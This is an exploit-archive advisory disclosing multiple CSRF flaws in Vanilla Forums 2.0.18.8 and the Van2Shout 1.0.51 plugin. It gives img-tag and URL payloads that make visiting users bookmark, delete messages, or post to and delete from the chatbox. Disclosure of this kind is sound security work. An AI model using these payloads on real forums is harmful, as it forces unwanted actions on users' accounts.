[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Vanilla Forums Van2Shout Plugin 1.0.51 - Multiple CSRF Vulnerabilities
# Published : 2013-04-15
# Author :
# Previous Title : Oracle WebCenter Sites Satellite Server - HTTP Header Injection
# Next Title : CMSLogik 1.2.1 - Multiple Vulnerabilities
# Exploit Title:
Vanilla Forums <= 2.0.18.8 & Van2Shout 1.0.51 Multiple CSRF
# Google Dork: n/a
# Date: 13/4/13
# Exploit Author: Henry Hoggard
# Vendor Homepage: [http://vanillaforums.org/ ,
http://vanillaforums.org/addon/van2shout-plugin]
# Software Link: [http://vanillaforums.org/download,
http://vanillaforums.org/get/van2shout-plugin-1.051]
# Version: [2.0.18.8 , 1.0.51]
# Tested on: [Debian]
# CVE :
=======================
You can exploit these by having the user visit a thread with the img src
of the below urls.
eg <img
src="http://site.org/index.php=/vanilla/discussion/bookmark/1337?> where
1337 is the id.
Bookmark CSRF:
http://site.org/index.php=/vanilla/discussion/bookmark/1337
UnBookmark CSRF
http://site.org/index.php=/vanilla/discussion/bookmark/1337?
Delete Message CSRF
http://site.org/index.php=/messages/clear/1337
Post to Van2Shout Chat Box CSRF
http://site.org/index.php?p=/plugin/Van2ShoutData&newpost=testmessage
Delete Message from Van2Shout Chatbox CSRF
http://site.org/index.php?p=/plugin/Van2ShoutData&del=1337